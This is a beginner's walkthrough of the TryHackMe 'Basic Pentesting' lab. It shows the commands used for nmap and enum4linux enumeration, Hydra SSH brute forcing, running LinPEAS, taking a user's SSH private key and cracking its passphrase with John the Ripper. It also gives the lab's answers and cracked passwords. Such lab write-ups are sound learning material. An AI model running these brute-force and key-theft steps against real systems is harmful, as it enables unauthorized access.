Basic Pentesting
Web App Testing, Linux Privilege Escalation
This is my first ever lab in THM! It was pretty interesting to apply the tools like nmap, LinPEAS, enum4linux, Hydra and more.
Lab: https://tryhackme.com/room/basicpentestingjt
Tasks
Deploy the Machine and connect to our network Refer to the THM https://tryhackme.com/access webpage to set up the machine and VPN
Find the services exposed by the machine Question Hint: use an nmap scan to look for the open ports This tests on the basics on network recon. I created a directory first, to store the output and used sublime text to read through the output better (rather than reading it off the CLI)
mkdir nmap
nmap -sC -sV -oN nmap/initial
subl nmap/initial

From here, there are a few open ports: 22 running Ubuntu, 139 running Samba, 445 running Samba.
Hence, these are the services exposed by the machine.
What is the name of the hidden directory on the webserver(enter name without /)? Question Hint: use dirsearch/dirbuster to find the hidden directories
While I didn't use dirbuster/dirsearch/gobuster for this question, I found out that you can use nmap and enum4linux directly to retreive the hidden directory.
Firstly, I went to the webserver to take a look which showed this (ctrl+u to view source)

Based on this, there should be a dev note section somewhere, so we have to use a domain enumeration tool.
sudo nmap -p80 --script http-enum 10.10.38.122
enum4linux -a 10.10.38.122 | tee enum4linux.log
subl enum4linux.log

And that was the output! /development/ was the directory we were looking for. Entering the flag development gave us the correct answer. :)
Opening the site, I am faced with

in dev.txt:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
in j.txt:
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
User brute-forcing to find the username & password
Going to the enum4linux script, I am able to get the usernames available, which...

... does answer question 5 and 9
Moving on to finding the password, I used hydra with the rockyou.txt file to bruteforce it.
hydra -l jan -P '/usr/share/wordlists/rockyou.txt' ssh://10.10.38.122

And from there, I was able to retrieve the password to the user Jan, which was armando.
What is the username? Question Hint: what about using SMB to find a username?
Refer to qn 4. Answer: Jan
What is the password? Question Hint: What about using a tool like hydra to bruteforce?
Refer to qn 4. Answer: armando
What service do you use to access the server(answer in abbreviation in all caps)? Question Hint: what command line utility is used for remote access?
To gain remote access:
ssh [email protected]
yes
armando
Hence, the answer is SSH.
Enumerate the machine to find any vectors for privilege escalation Question Hint: use a privilege escalation checklist or tool like LinEnum
For the privilege escalation, I utilised LinPEAS, a popular tool which contains scripts for privilege escalation for Linux systems.
But before that, I wanted to take a look around in the files and directories itself.
[Although it didn't really work as there was not very high level of privileges granted to jan.]
ls -la
cat .lesshst
cat /etc/passwd
sudo -l
cd ..
ls
cd kay
There wasn't much useful information here due to privilege issues, so I moved on to use LinPEAS.
Refer to qn 10 for continuation
What is the name of the other user you found(all lower case)? Refer to qn 8. Answer: kay
If you have found another user, what can you do with this information? Question Hint: apart from a password, how else can a user access a machine?
I first copied the linPEAS script that is already available on the THM machine into the target machine using SCP.
scp /opt/PEAS/linPEAS/linpeas.sh [email protected]:/dev/shm
armando
After which, I made the script into an executable and ran it, piping the output to both the console and linpeas.txt.
cd/dev/shm
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.txt
LinPEAS did identify that there is an id_rsa file which should have the SSH private key, so we can retrieve it back to the host, and now it gets more interesting!
cd /home/kay
ls
cd. ssh/
ls -la
cat id_rsa
nano kay_id_rsa
chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay [email protected]

What is the final password you obtain? Question Hint: use john the ripper to bruteforce the passphrase
Because we know from the note left on the webserver earlier, Kay has set an easy-to-crack password. So, the tool John The Ripper comes in handy.
Firstly, I had to convert the rsa file into a format suitable for cracking.
Then, I used a popular wordlist, rockyou.txt which was also preinstalled into the THM machine.
/opt/JohnTheRipper/run/ssh2john.py kay_id_rsa > kay_id_rsa.hash
/opt/JohnTheRipper/run/john kay_id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

And we got the password beeswax, which is the SSH private key passphrase.
Now that we have the passphrase, we can login.
ssh -i kay_id_rsa kay [email protected]
beeswax
ls -la
cat pass.bak
While I completely forgot to take a screenshot of the password obtained:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Here is the full writeup of this lab done and dusted!
Last updated